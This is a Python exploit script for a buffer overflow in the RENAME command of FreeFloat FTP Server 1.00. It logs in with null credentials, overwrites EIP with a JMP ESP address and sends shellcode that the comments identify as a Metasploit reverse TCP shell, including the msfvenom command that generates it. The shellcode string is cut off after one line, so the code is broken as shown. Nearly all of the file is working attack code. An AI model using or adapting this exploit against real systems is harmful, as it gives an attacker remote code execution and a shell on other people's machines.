#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title:FreeFloat FTP Server RENAME Command Buffer Overflow Exploit
# Date: 29/10/2016
# Exploit Author: Eagleblack
# Software Link:http://www.freefloat.com/software/freefloatftpserver.zip
# Version:1.00
# Tested on:Windows XP Profesional SP3 Spanish version x86
# CVE : N/A
#Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a
# longchain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry
# he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain
# a remote code execution on the system that is running the FTP Server, in this case Windows XP.
import socket
ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer
#Metasploit shellcode:
#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
buffer ='\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
connect = s.connect(('',21))#IP address and port (21) from the target
s.send('USER \r\n') #Sending USER (Null user)
s.send('PASS \r\n') #Sending Password (Null password)
s.send('RENAME' + buffer +'\r\n')